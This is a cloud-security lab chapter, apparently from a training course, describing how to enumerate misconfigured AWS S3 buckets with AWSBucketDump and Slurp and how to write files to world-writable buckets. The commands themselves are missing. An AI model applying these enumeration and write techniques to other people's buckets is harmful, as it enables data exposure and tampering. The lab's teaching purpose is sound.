Abusing AWS S3 misconfigurations
Introduction
AWS S3 is a storage service by Amazon. Any kind of file. Permissions can be then given per object and per bucket.
Most often than not, AWS S3 buckets have been discovered with weak permissions on individual objects or the entire buckets itself. Files and folders which should not be public are made world readable and available to the world for inspection.
What are we going to cover?
This chapter covers the common attacks that can occur on misconfigured buckets and data leak that can occur due to this.
Steps to setup lab
Run the following script in student VM to set up the target environment
If you see any error, please inform one of the trainers
We will use the following dictionary to search for S3 buckets
Make a backup of the BucketNames.txt file using
just in case we mess up the file while doing the search replacement in the next section :)
Add '-unique-name-awscloudsec' to the end of every line in the dictionary. Replace your unique-name here. This is so that your dictionary can be used to attack and find your own buckets on the Internet. You can do this with sed
Steps to attack
We will use AWSBucketDump to complete this exercise although any other tool that can fetch bucket information would do. A great alternate tool to use is Digi Ninja's bucket_finder
ruby script
Open Terminal and navigate to the ~/tools/AWSBucketDump
folder
Create a zero byte grep file and provide it to AWSBucketDump. This is used by AWSBucketDump to grep through the results, but since here we create a 0 byte file, it will show everything (which is what we want).
Kill the script once it reaches the end of the file and is stuck.
To see the results, open the interesting_file.txt
to see the discovered content.
Did you find anything interesting in the bucket(s)?
Bucket hunting on Steroids
Slurp is an advanced and versatile tool for Amazon S3 bucket enumeration. Slurp supports various S3 bucket enumeration techniques along with permutation based enumeration. As Slurp is written in Golang it is blazing fast and it is available as single portable binary file.
Following techniques are supported by Slurp for enumerating S3 buckets -
Permutations - Similar to other S3 enumeration tools where buckets are discovered using known patterns
AWS Credentials - Slurp can use existing AWS Credentials to discover any mis-configured buckets in the AWS account that corresponds to the credentials
Domain - Discovers S3 buckets using a domain name
Slurp - DEMO
keyword mode
domain mode
internal mode (Using AWS credentials)
For this technique to work, make sure atleast one profile is configured under ~/.aws/credentials
Additional exercise - Writing data to a bucket
Enumerate a bucket's ACL using the command
For example
For S3 buckets that have public read AND write access, the output will have the permission set to "FULL_CONTROL".
You can write to such a bucket using the credentials of any AWS account in the world, as shown below. The command attempts to upload a file called readme.txt
using the credentials of a user added to AWS configure profiles
You can see if the file has been uploaded using
Additional references
Last updated